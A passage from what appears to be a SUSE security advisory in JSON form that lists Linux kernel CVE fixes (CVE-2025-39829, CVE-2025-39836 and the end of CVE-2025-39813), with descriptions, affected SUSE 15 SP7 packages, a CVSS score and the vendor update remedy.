"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-39813"
},
{
"cve": "CVE-2025-39829",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39829"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntrace/fgraph: Fix the warning caused by missing unregister notifier\n\nThis warning was triggered during testing on v6.16:\n\nnotifier callback ftrace_suspend_notifier_call already registered\nWARNING: CPU: 2 PID: 86 at kernel/notifier.c:23 notifier_chain_register+0x44/0xb0\n...\nCall Trace:\n \u003cTASK\u003e\n blocking_notifier_chain_register+0x34/0x60\n register_ftrace_graph+0x330/0x410\n ftrace_profile_write+0x1e9/0x340\n vfs_write+0xf8/0x420\n ? filp_flush+0x8a/0xa0\n ? filp_close+0x1f/0x30\n ? do_dup2+0xaf/0x160\n ksys_write+0x65/0xe0\n do_syscall_64+0xa4/0x260\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nWhen writing to the function_profile_enabled interface, the notifier was\nnot unregistered after start_graph_tracing failed, causing a warning the\nnext time function_profile_enabled was written.\n\nFixed by adding unregister_pm_notifier in the exception path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39829",
"url": "https://www.suse.com/security/cve/CVE-2025-39829"
},
{
"category": "external",
"summary": "SUSE Bug 1250082 for CVE-2025-39829",
"url": "https://bugzilla.suse.com/1250082"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-39829"
},
{
"cve": "CVE-2025-39836",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39836"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nefi: stmm: Fix incorrect buffer allocation method\n\nThe communication buffer allocated by setup_mm_hdr() is later on passed\nto tee_shm_register_kernel_buf(). The latter expects those buffers to be\ncontiguous pages, but setup_mm_hdr() just uses kmalloc(). That can cause\nvarious corruptions or BUGs, specifically since commit 9aec2fb0fd5e\n(\"slab: allocate frozen pages\"), though it was broken before as well.\n\nFix this by using alloc_pages_exact() instead of kmalloc().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
